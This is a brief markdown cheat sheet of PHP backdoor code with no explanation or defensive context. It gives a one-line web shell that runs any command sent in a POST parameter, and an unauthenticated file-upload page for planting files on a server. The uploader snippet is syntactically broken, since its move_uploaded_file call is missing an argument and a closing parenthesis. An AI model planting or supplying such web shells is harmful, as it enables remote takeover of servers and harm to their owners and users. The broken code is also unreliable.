# PHP Backdoor basics

## Shell basic

Classic
	<?php system($_POST['c']);?>



## Uploader basic
	<?php
	if ($_FILES["file"]["error"] > 0) {
	  echo "Error: " . $_FILES["file"]["error"] . "<br>";
	  }
	else{
	  move_uploaded_file($_FILES["file"]["name"]
	  }
	?> 
	<html>
	<body>
	<form action="up.php" method="post" enctype="multipart/form-data">
	<label for="file">Fnam:</label>
	<input type="file" name="file" id="file"><br>
	<input type="submit" name="submit" value="Submit">
	</form>
	</body>
	</html> 